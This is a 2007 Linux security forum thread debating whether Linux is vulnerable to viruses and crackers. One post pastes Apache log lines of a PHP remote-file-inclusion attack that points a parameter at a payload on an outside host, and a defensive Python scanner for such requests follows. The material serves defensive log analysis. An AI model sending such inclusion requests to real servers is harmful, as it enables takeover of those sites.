LinuxQuestions.org
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Poll: Vulnerable?
The nominees are:

Yes to both.
No to both.
Yes to viruses.
Yes to hackers.
Other (explain)

Old 09-19-2007, 10:16 PM   #1
phantom_cyph
Senior Member
 
Registered: Feb 2007
Location: My HDD...
Distribution: WinXP for designing, Linux for life.
Posts: 2,329
Blog Entries: 1

Rep: Reputation: 47
Vulnerable?


Some people say not to worry about viruses in Linux, others do. Some say Linux is a rock-solid wall against hackers, others say it's like cutting butter. What do you say?


------------
Personally, I feel like I'd worry more about viruses than hackers (blackhat anyway) 'cause it's a lot simpler to just stick with hacking/cracking Windows or Macs. Other thing is, Linux unlike Windows and Mac has a community, which I think helps keep things in check. I don't keep any sensitive material on my computers anyway that I worry about. Don't have a credit card, so I don't really care. Only thing they'd find is a lot of image editing, web designing, and amateur programming. That's just my humble opinion...

Last edited by phantom_cyph; 09-19-2007 at 10:42 PM. Reason: Gave my explanation...
 
Old 09-19-2007, 10:31 PM   #2
SlowCoder
Member
 
Registered: Oct 2004
Location: Southeast, U.S.A.
Distribution: Fedora (Desktop), CentOS (Server), Knoppix (Diags)
Posts: 934

Rep: Reputation: 38
Nothing is 100% solid. Patches fix current security holes in any OS and software. But as software is innovated, new holes will be unknowingly (or rarely knowingly) introduced. There is a race between the whitehats and the blackhats to find these holes, and a difference of just a small amount of time can mean the difference in a world of cracked or happy systems.

Even if you did have a perfectly patched OS, there are still possible holes at the hardware level, such as BIOS or OSI layers 1 and 2.

The best we can hope for is a multi-layer protection, hiding behind firewalls and NATs, killing unneeded services, making sure we're patched to the highest version, etc.
 
Old 09-19-2007, 10:37 PM   #3
phantom_cyph
Senior Member
 
Registered: Feb 2007
Location: My HDD...
Distribution: WinXP for designing, Linux for life.
Posts: 2,329
Blog Entries: 1

Original Poster
Rep: Reputation: 47
OK, I'll make an edit to the post. This is all in relation to Windows.

@SlowCoder, good point, and I hope whitehats find it first, I don't feel like having blacks and cracks knocking on my gateway.
 
Old 09-19-2007, 10:37 PM   #4
AceofSpades19
Senior Member
 
Registered: Feb 2007
Location: Chilliwack,BC.Canada
Distribution: Slackware64 -current
Posts: 2,079

Rep: Reputation: 57
Generally speaking you do not need to worry about viruses in linux right now, considering right now there aren't any to speak of. But that doesn't mean it is impossible to make one.
 
Old 09-19-2007, 11:02 PM   #5
unixfool
Member
 
Registered: May 2005
Location: Northern VA
Distribution: Slackware, Ubuntu, FreeBSD, OpenBSD, OS X
Posts: 781
Blog Entries: 8

Rep: Reputation: 157
Quote:
Originally Posted by AceofSpades19 View Post
Generally speaking you do not need to worry about viruses in linux right now, considering right now there aren't any to speak of.
That you know of. And I wouldn't say that there shouldn't be any worry, either. As Linux gains market share, it gains popularity...sooner or later (and the way technology changes so quickly nowadays, it'll probably be sooner THAN later) something's going to happen. There are already rootkits, trojans, and other malware that affect Linux systems (although they usually affect userland, the effect, that doesn't lessen the impact)...I'm pretty sure someone out there is toying with some code that will change history.
 
Old 09-19-2007, 11:29 PM   #6
AceofSpades19
Senior Member
 
Registered: Feb 2007
Location: Chilliwack,BC.Canada
Distribution: Slackware64 -current
Posts: 2,079

Rep: Reputation: 57
There have always been rootkits and trojans affecting Linux, and there have been Linux viruses; it's just that they haven't been very successful because they haven't been able to spread very much, for 2 reasons:
1. the holes they exploit are patched within a short period
2. Linux is so diverse that it is very hard to find an exploit that will harm enough machines to make it successful
 
Old 09-20-2007, 07:37 AM   #7
brianL
LQ 5k Club
 
Registered: Jan 2006
Location: Oldham, Lancs, England
Distribution: Slackware & Slackware64 14.1
Posts: 7,135
Blog Entries: 52

Rep: Reputation: Disabled
If there are no malware threats to GNU/Linux then why does every distro need security update patches? The threat isn't as great as it is with Windows, but it's there.
 
Old 09-20-2007, 08:49 AM   #8
b0uncer
Guru
 
Registered: Aug 2003
Distribution: CentOS, OS X
Posts: 5,131

Rep: Reputation: Disabled
Every operating system is vulnerable against cracking attacks (I prefer to use the word 'cracking' for doing illegal things, and 'hacking' for doing non-illegal things, like testing to see if a program works like it should, for example). Viruses..well, Windows as a platform is like a nice wet bed for all kinds of mutant organisms to grow on. Linux (and other Unix-like) operating systems have a different approach from the start, so it makes it more difficult for Windows-like viruses to spread on them..macroviruses (that I don't think of as 'viruses' myself, they're just macros and that's it) can spread everywhere where they can run, but apart from that, Linux is less vulnerable against 'viruses' than Windows is (if you want to compare). This is a thing that can be affected, though; if you just want things to be easy, don't think about security and do some things that ease up your life (but without thinking about the consequences), you may let anybody run anything on your machine, which basically opens doors to malware programs ('viruses'). On the other hand, if you don't just take everything offered, and maybe think a bit about the security of the system, it's pretty hard to get something like a computer virus spread wildly on the machine and its fellows.

It all depends on the interests of the administrator/users, but generally, if people don't try to make it too easy for the badasses, I consider there's not much to be afraid of about viruses (macro 'viruses': just don't load every macro you're offered..or do you? do you trust a macro that Jesus sent you from the Kambodza, saying it makes your floppy drive print cash if you just let it run?). Crackers are a real threat, as they're human, and there are no bullet-proof systems; the difference between a cracker threat (human) and a virus threat (non-human) is that crackers think and learn, viruses don't (unless somebody rewrites them, which takes more time than a cracker learning).

The more known and used an operating system becomes, the more vulnerable it becomes.
 
Old 09-20-2007, 02:47 PM   #9
OlRoy
Member
 
Registered: Dec 2002
Posts: 304

Rep: Reputation: 86
A vulnerability is a weakness, or a lack of a countermeasure. It is possible for Linux to be infected with a virus, it's just nowhere near as common as it is for Windows.
 
Old 09-20-2007, 06:37 PM   #10
AceofSpades19
Senior Member
 
Registered: Feb 2007
Location: Chilliwack,BC.Canada
Distribution: Slackware64 -current
Posts: 2,079

Rep: Reputation: 57
Quote:
Originally Posted by b0uncer View Post
Every operating system is vulnerable against cracking attacks (I prefer to use the word 'cracking' for doing illegal things, and 'hacking' for doing non-illegal things, like testing to see if a program works like it should, for example). Viruses..well, Windows as a platform is like a nice wet bed for all kinds of mutant organisms to grow on. Linux (and other Unix-like) operating systems have a different approach from the start, so it makes it more difficult for Windows-like viruses to spread on them..macroviruses (that I don't think of as 'viruses' myself, they're just macros and that's it) can spread everywhere where they can run, but apart from that, Linux is less vulnerable against 'viruses' than Windows is (if you want to compare). This is a thing that can be affected, though; if you just want things to be easy, don't think about security and do some things that ease up your life (but without thinking about the consequences), you may let anybody run anything on your machine, which basically opens doors to malware programs ('viruses'). On the other hand, if you don't just take everything offered, and maybe think a bit about the security of the system, it's pretty hard to get something like a computer virus spread wildly on the machine and its fellows.

It all depends on the interests of the administrator/users, but generally, if people don't try to make it too easy for the badasses, I consider there's not much to be afraid of about viruses (macro 'viruses': just don't load every macro you're offered..or do you? do you trust a macro that Jesus sent you from the Kambodza, saying it makes your floppy drive print cash if you just let it run?). Crackers are a real threat, as they're human, and there are no bullet-proof systems; the difference between a cracker threat (human) and a virus threat (non-human) is that crackers think and learn, viruses don't (unless somebody rewrites them, which takes more time than a cracker learning).

The more known and used an operating system becomes, the more vulnerable it becomes.
Not necessarily, for example, look at the Apache web server: more than 50% of web servers use it, there aren't tons of viruses exploiting it or malware for that matter. It's the open-source development model that prevents most viruses from becoming viable on Linux. Look at Windows for example, and look for how long it takes for a patch to be released, now compare it to the patch time of Linux; it takes a lot less time for patches to come out for Linux because:
a. there are more people looking at the code than in Windows
b. Microsoft doesn't necessarily have to patch it. They can wait as long as they want because they are the only people able to patch it, but with Linux anyone can write a patch for it and submit it
and so it is a lot harder for a virus to be successful on Linux
 
Old 09-21-2007, 01:04 AM   #11
2damncommon
Senior Member
 
Registered: Feb 2003
Location: Calif, USA
Distribution: Debian Wheezy
Posts: 2,839

Rep: Reputation: 48
Quote:
Originally Posted by phantom_cyph View Post
Some people say not to worry about viruses in Linux, others do. Some say Linux is a rock-solid wall against hackers, others say it's like cutting butter. What do you say?
WTF?
Any software is vulnerable to what it is discovered to be vulnerable to.
Any fortress can be breached. Any fortress that has not been breached will be.
It is true to say a classic Linux setup can protect against vulnerabilities.
It is true to say that users themselves may be a major cause of breaches.
With any software you realize its strengths and weaknesses, use the tools available to be informed and protect yourself, and see new discoveries on the daily news.
Linux being invulnerable under any circumstances is nonsense. Linux being strong is not.
 
Old 09-21-2007, 09:12 AM   #12
unixfool
Member
 
Registered: May 2005
Location: Northern VA
Distribution: Slackware, Ubuntu, FreeBSD, OpenBSD, OS X
Posts: 781
Blog Entries: 8

Rep: Reputation: 157
Quote:
Originally Posted by AceofSpades19 View Post
Not necessarily, for example, look at the Apache web server: more than 50% of web servers use it, there aren't tons of viruses exploiting it or malware for that matter. It's the open-source development model that prevents most viruses from becoming viable on Linux. Look at Windows for example, and look for how long it takes for a patch to be released, now compare it to the patch time of Linux; it takes a lot less time for patches to come out for Linux because:
a. there are more people looking at the code than in Windows
b. Microsoft doesn't necessarily have to patch it. They can wait as long as they want because they are the only people able to patch it, but with Linux anyone can write a patch for it and submit it
and so it is a lot harder for a virus to be successful on Linux
Actually, if you look at Apache logs, you'll see (at least I do) quite a few attacks against it. Usually it is varied attacks. Since Apache has many configuration options and because Apache can run PHP, SQL, and many other software behind it, it serves as a conduit for badness.

All public servers get attacked, and there are some attacks specific to Linux-based web servers. If you want to see, I can post a snippet of my logs.

What do I normally see? Tons of either PHP-based attacks, CGI-type attacks (basically, most of the attacks appear to be targeting systems that may be serving dynamic content), SQL injection, walking the directories to see what access they can gain...I can think of much more given time and a direct analysis of my logs.

Since Apache is serving as a conduit a majority of the time, patching Apache won't help...a PHP-based attack has nothing to do with Apache itself, so patching Apache does nothing, in this case.

Harden Apache all you want, but in this day and age, you're doomed to fail if you think that patching Apache will protect you from things like attacks on backend systems that pipe their data to Apache.

EDIT:

Apache access logs are below -

Code:
<attacker IP> - - [21/Sep/2007:11:37:16 -0400] "GET slackware_botlogs/%3Cwbr%20/%3Eslackware.log.12May2007/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.studiopietrini.com/contenido/classes/id.txt? HTTP/1.1" 404 306
<attacker IP> - - [21/Sep/2007:11:37:16 -0400] "GET /slackware_botlogs/%3Cwbr%20/%3Eslackware.log.12May2007/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.studiopietrini.com/contenido/classes/id.txt? HTTP/1.1" 404 306 "-" "libwww-perl/5.76"
<attacker IP> - - [21/Sep/2007:11:37:16 -0400] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.studiopietrini.com/contenido/classes/id.txt? HTTP/1.1" 404 251
<attacker IP> - - [21/Sep/2007:11:37:16 -0400] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.studiopietrini.com/contenido/classes/id.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.76"
<attacker IP> - - [21/Sep/2007:11:37:17 -0400] "GET /slackware_botlogs/%3Cwbr%20/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.studiopietrini.com/contenido/classes/id.txt? HTTP/1.1" 404 278
<attacker IP> - - [21/Sep/2007:11:37:17 -0400] "GET /slackware_botlogs/%3Cwbr%20/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.studiopietrini.com/contenido/classes/id.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.76"
<attacker IP> - - [21/Sep/2007:11:37:34 -0400] "GET /slackware_botlogs/%3Cwbr%20/%3Eslackware.log.11Mar2007/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.studiopietrini.com/contenido/classes/id.txt? HTTP/1.1" 404 306
<attacker IP> - - [21/Sep/2007:11:37:34 -0400] "GET /slackware_botlogs/%3Cwbr%20/%3Eslackware.log.11Mar2007/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.studiopietrini.com/contenido/classes/id.txt? HTTP/1.1" 404 306 "-" "libwww-perl/5.76"
Is this a Linux-based attack? No, it is a PHP-based attack that can be used against anything running PHP, whether it is *nix or win*. The attack is using Apache as a vector, though. And, plenty of these types of attacks are successful. If you resolve the attacker IP and follow the directory structure that the attacking IP uses in some Lupper-style attacks, you can see that in most cases, the attacker IP is actually a compromised machine that is now attacking another machine...you can usually see the hosted exploit code.

Last edited by unixfool; 09-21-2007 at 11:55 AM. Reason: log format screwed up
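
An added example, not part of unixfool's post or anyone's code in this thread: a small Python scanner for the kind of request shown in the logs above, where a query parameter (there, `mosConfig_live_site`) carries an absolute URL. The sample log lines, client addresses and the `payload.example` host are constructed for illustration, and the 2xx counter is an assumed triage aid, not proof of compromise.

```python
import re
from urllib.parse import parse_qsl, unquote

# Matches both formats seen in the post: common (ends at size) and
# combined (adds "referer" "user-agent").
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?\s*$')
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample input (documentation address ranges, reserved .example TLD).
SAMPLE_LOG = """\
192.0.2.10 - - [21/Sep/2007:11:37:16 -0400] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://payload.example/id.txt? HTTP/1.1" 404 251
192.0.2.10 - - [21/Sep/2007:11:37:16 -0400] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://payload.example/id.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.76"
192.0.2.10 - - [21/Sep/2007:11:37:17 -0400] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http%3A%2F%2Fpayload.example%2Fid.txt%3F HTTP/1.1" 200 1830 "-" "libwww-perl/5.76"
198.51.100.7 - - [21/Sep/2007:11:38:02 -0400] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Sep/2007:11:38:05 -0400] "GET /search.php?q=apache+hardening HTTP/1.1" 200 2048
"""

def parse_line(line):
    """Return the log fields as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def remote_url_params(target):
    """Return [(name, value)] for query parameters whose value is an absolute URL."""
    query = target.partition("?")[2]
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        if unquote(value).strip().lower().startswith(REMOTE_SCHEMES):
            hits.append((name, value))
    return hits

def scan(lines):
    """Group requests with a remote URL in a parameter by client address."""
    report = {}
    for line in lines:
        rec = parse_line(line)
        hits = remote_url_params(rec["target"]) if rec else []
        if not hits:
            continue
        entry = report.setdefault(rec["host"], {
            "requests": 0, "params": set(), "agents": set(), "answered_2xx": 0})
        entry["requests"] += 1
        entry["params"].update(name for name, _ in hits)
        if rec["agent"]:
            entry["agents"].add(rec["agent"])
        if rec["status"].startswith("2"):
            entry["answered_2xx"] += 1  # path exists and answered: review first
    return report

if __name__ == "__main__":
    for host, entry in scan(SAMPLE_LOG.splitlines()).items():
        print(host, entry)
```

Parameters that legitimately carry URLs (redirect targets, for instance) will also be flagged, so a per-site allowlist of parameter names is the usual next step.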
 
Old 09-21-2007, 08:46 PM   #13
AceofSpades19
Senior Member
 
Registered: Feb 2007
Location: Chilliwack,BC.Canada
Distribution: Slackware64 -current
Posts: 2,079

Rep: Reputation: 57
Did I say that only patching Apache will protect it from attacks? No, I don't think so.
 
Old 09-22-2007, 10:05 AM   #14
phantom_cyph
Senior Member
 
Registered: Feb 2007
Location: My HDD...
Distribution: WinXP for designing, Linux for life.
Posts: 2,329
Blog Entries: 1

Original Poster
Rep: Reputation: 47
This thread was meant for opinions, not hostility. Ace shouldn't have to defend himself as this isn't a debate class.
 
Old 09-22-2007, 11:20 AM   #15
win32sux
Guru
 
Registered: Jul 2003
Location: Los Angeles
Distribution: Ubuntu
Posts: 9,870

Rep: Reputation: 371
Quote:
Originally Posted by phantom_cyph View Post
This thread was meant for opinions, not hostility. Ace shouldn't have to defend himself as this isn't a debate class.
If there was something said that you feel violates the LQ Rules, please use the Report button and the Mod Team will look into the matter ASAP. I've gone over the thread and I can't find anything "hostile". If you (or anyone else) wish to further discuss this, please email me or another member of the Mod Team, otherwise the thread will get cluttered-up with a bunch of off-topic posts.

That said, you shouldn't really be surprised that a Linux virus thread can get some people very excited. It's actually a well-known phenomenon. BTW, even though this isn't a debate class, we actually do encourage a healthy dose of debate here, as long as it is not off-topic and no relevant LQ Rules are violated.

Last edited by win32sux; 09-22-2007 at 11:26 AM.
 
  

